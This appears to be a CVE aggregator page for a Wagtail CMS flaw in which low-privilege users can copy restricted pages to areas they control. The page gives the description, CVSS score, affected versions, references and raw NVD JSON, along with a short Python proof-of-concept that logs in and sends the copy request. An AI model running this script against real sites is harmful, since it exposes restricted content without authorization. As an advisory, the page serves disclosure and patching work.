CVE-2026-44200

Description

Wagtail is an open source content management system built on Django. Prior to 7.0.7, 7.3.2, and 7.4, a CMS user with limited access to pages could copy a page they don't have access to to an area of the site they do. Once coped, they'd be able to view its contents, and potentially publish it. Permissions were correctly checked for the copy destination, but not for the source page. This vulnerability is fixed in 7.0.7, 7.3.2, and 7.4.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:* - VULNERABLE

Wagtail < 7.0.7

Wagtail >= 7.1.0, < 7.3.2

Wagtail >= 7.3.0, < 7.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL configuration
base_url = "https://example.com"
login_url = f"{base_url}/admin/login/"
copy_url = f"{base_url}/admin/pages/move/"

# Attacker credentials (low privilege)
creds = {
    "username": "limited_user",
    "password": "password123"
}

session = requests.Session()

# 1. Authenticate to the CMS
session.post(login_url, data=creds)

# 2. Exploit: Copy restricted page (ID: 10) to allowed parent (ID: 5)
payload = {
    "page_to_move": "10",  # Source page ID (Restricted)
    "container_page": "5",  # Destination page ID (Allowed)
    "action": "copy"
}

response = session.post(copy_url, data=payload)

if response.status_code == 200:
    print("[+] Exploit successful! Page copied to accessible area.")
else:
    print("[-] Exploit failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44200
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44200
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44200/
[4] VulDB https://vuldb.com/cve/CVE-2026-44200
[5] https://github.com/wagtail/wagtail/security/advisories/GHSA-67rv-mg8q-5pf3

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44200", "sourceIdentifier": "[email protected]", "published": "2026-05-11T16:17:35.713", "lastModified": "2026-05-12T15:57:27.673", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wagtail is an open source content management system built on Django. Prior to 7.0.7, 7.3.2, and 7.4, a CMS user with limited access to pages could copy a page they don't have access to to an area of the site they do. Once coped, they'd be able to view its contents, and potentially publish it. Permissions were correctly checked for the copy destination, but not for the source page. This vulnerability is fixed in 7.0.7, 7.3.2, and 7.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-280"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.7", "matchCriteriaId": "AA54A323-7F77-4D1D-9830-BF8FBE4B5B34"}, {"vulnerable": true, "criteria": "cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.1", "versionEndExcluding": "7.3.2", "matchCriteriaId": "FED1A6D7-1193-485D-B25F-60FCC20A6D6B"}]}]}], "references": [{"url": "https://github.com/wagtail/wagtail/security/advisories/GHSA-67rv-mg8q-5pf3", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}